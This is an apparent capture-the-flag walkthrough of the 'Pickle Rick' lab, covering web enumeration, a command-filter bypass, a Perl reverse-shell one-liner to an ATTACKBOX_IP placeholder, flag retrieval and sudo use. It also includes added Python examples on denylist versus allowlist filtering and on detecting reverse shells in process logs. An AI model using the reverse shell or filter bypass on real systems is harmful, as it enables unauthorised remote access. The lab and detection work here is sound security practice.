Prerequisites for this machine:
- Familiarity with enumeration with Nmap and ffuf or gobuster
- Basic understanding of web applications
- Basic Linux knowledge
Enumeration
Running an Nmap scan on the machine shows two open ports, 80 and 22.
Looking at the website itself doesn’t lead to anything interesting, but checking the page source gives us a username: R1ckRul3s
Checking the site’s robots.txt gives us a weird-looking string. Note it down!
Through our web enumeration, we find the page /login.php. Using the username and the string we found, we can log in.
Great! We have initial access to the machine. Running ls -la shows us two interesting files:
- Sup3rS3cretPickl3dIngred.txt
- clue.txt
However, trying to cat the ingredient text file gives us an error.
Hint: cat is blocked, but that doesn’t mean other commands are.
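The hint above is the whole lesson of the room’s command panel: a filter that only blocks a handful of named binaries says nothing about every other program on the box. The following is an added example, not the room’s PHP code, that puts the two designs side by side in Python. The denylist contents, the action names and the helper names (denylist_permits, allowlist_argv, run_allowed) are all constructed for illustration.

```python
import shlex
import subprocess
from typing import Optional

# Constructed example, not the room's own code: two ways a web "command panel"
# might decide whether to run what a user typed.

# 1. Denylist: block a few named binaries and let everything else through.
DENYLIST = {"cat", "head", "tail", "more", "less"}  # constructed list


def denylist_permits(command: str) -> bool:
    """True when the first word is not on the denylist.

    The check knows nothing about the rest of the string, so any interpreter
    or tool not named in DENYLIST (the write-up's perl one-liner, for
    instance) is accepted unchanged. This is the weak design.
    """
    try:
        words = shlex.split(command)
    except ValueError:
        return False  # unbalanced quotes: refuse rather than guess
    return bool(words) and words[0] not in DENYLIST


# 2. Allowlist: the user picks an action name, the server owns the full argv,
#    and no user text ever reaches a shell. Unknown actions are rejected, so
#    there is nothing to "bypass".
ALLOWED_ACTIONS = {
    "list": ["ls", "-la"],
    "whoami": ["whoami"],
}


def allowlist_argv(action: str) -> Optional[list]:
    """Return the fixed argv for a known action, or None if it is not allowed."""
    argv = ALLOWED_ACTIONS.get(action)
    return list(argv) if argv else None


def run_allowed(action: str) -> subprocess.CompletedProcess:
    """Run an allowlisted action with shell=False so nothing parses user input."""
    argv = allowlist_argv(action)
    if argv is None:
        raise PermissionError(f"action {action!r} is not on the allowlist")
    return subprocess.run(argv, capture_output=True, text=True, check=False)


if __name__ == "__main__":
    for cmd in ("ls -la", "cat Sup3rS3cretPickl3dIngred.txt", "perl -e 'print 1'"):
        print(f"denylist permits {cmd!r}: {denylist_permits(cmd)}")
    for action in ("list", "cat clue.txt"):
        print(f"allowlist argv for {action!r}: {allowlist_argv(action)}")
```

Running it shows the denylist rejecting cat but waving perl straight through, exactly the behaviour the room relies on, while the allowlist only ever returns argv it defined itself.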
Time to use a reverse shell!
Getting the first flag
Some simple reverse shells can be found here.
Trying the bash reverse shell doesn’t work, but the Perl one does!
Remember to replace ATTACKBOX_IP and ATTACKBOX_PORT with your AttackBox’s IP address and a port of your choosing.
perl -e 'use Socket;$i="ATTACKBOX_IP";$p=ATTACKBOX_PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Start a netcat listener on that port first, then run the payload on the machine.
Back to our netcat listener, we have a shell!
Let’s get the first flag.
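From the defender’s side, the shell we just caught has a very recognisable shape in process-creation telemetry: a web service account spawning an interpreter whose command line opens a network socket, points stdin/stdout/stderr at it and execs an interactive shell. The following is an added example, not part of the write-up, that runs that check over a few constructed audit records. The log format (pid, user, command line per row), the rule names and the sample records are all constructed; the one suspicious record mirrors the payload shape shown above with the RFC 5737 documentation address 192.0.2.10 standing in for the attacker’s host.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed process-creation records (not captured from the room): one record
# per line, "<pid> <user> <command line>", the shape a simple auditd/EDR export
# might take. 192.0.2.10 is a documentation address, not a real host.
SAMPLE_LOG = """\
1201 www-data /bin/sh -c ls -la
1202 www-data /bin/sh -c cat Sup3rS3cretPickl3dIngred.txt
1203 www-data perl -e use Socket;$i="192.0.2.10";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
1204 rick perl /usr/local/bin/report.pl --daily
1205 www-data /bin/sh -c whoami
"""

# A record is flagged when the command line opens a network socket AND either
# wires the standard streams to a descriptor or execs an interactive shell.
# That combination is the reverse-shell signature regardless of the language
# wrapping it; a lone socket call (a health check, say) is not enough.
NETWORK = re.compile(r"(socket\(|connect\(|SOCK_STREAM|/dev/tcp/|fsockopen\()")
STDIO_TO_SOCKET = re.compile(r'(open\(STD(?:IN|OUT|ERR),\s*"?>&|dup2\()')
INTERACTIVE_SHELL = re.compile(r"(/bin/(?:ba)?sh\s+-i|exec\(\s*['\"]/bin/(?:ba)?sh)")
WEB_ACCOUNTS = {"www-data", "apache", "nginx", "httpd"}  # constructed list

SOCKET_REASON = "opens a network socket from the command line"


@dataclass
class Finding:
    pid: str
    user: str
    reasons: List[str] = field(default_factory=list)


def inspect_record(pid: str, user: str, cmdline: str) -> Optional[Finding]:
    """Return a Finding when the command line carries a reverse-shell signature."""
    reasons = []
    if NETWORK.search(cmdline):
        reasons.append(SOCKET_REASON)
    if STDIO_TO_SOCKET.search(cmdline):
        reasons.append("redirects stdin/stdout/stderr to a descriptor")
    if INTERACTIVE_SHELL.search(cmdline):
        reasons.append("execs an interactive shell")
    # Require the socket plus at least one of the two shell-wiring behaviours.
    if SOCKET_REASON not in reasons or len(reasons) < 2:
        return None
    if user in WEB_ACCOUNTS:
        # Context, not a trigger: a web server account has no business doing this.
        reasons.append(f"spawned by web service account {user}")
    return Finding(pid, user, reasons)


def scan_log(text: str) -> List[Finding]:
    """Parse "<pid> <user> <cmdline>" rows and return every flagged record."""
    findings = []
    for line in text.splitlines():
        parts = line.split(maxsplit=2)
        if len(parts) < 3:
            continue  # malformed record: skip rather than guess
        pid, user, cmdline = parts
        finding = inspect_record(pid, user, cmdline)
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"pid {f.pid} ({f.user}): " + "; ".join(f.reasons))
```

On the sample above only record 1203 is flagged; the benign perl report run and the plain /bin/sh -c commands from the panel pass, which is the point of requiring the socket and the shell wiring together rather than alerting on "perl" alone.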
Getting the second flag
Time to find the next flag, check clue.txt.
Checking the /home directory, we can see a directory called rick, which contains our second flag in “second ingredients”.
Getting the last flag
Digging around the system more, we find our last flag in “/root/3rd.txt”. Since our user has sudo rights, we can print out the file contents and get the third flag!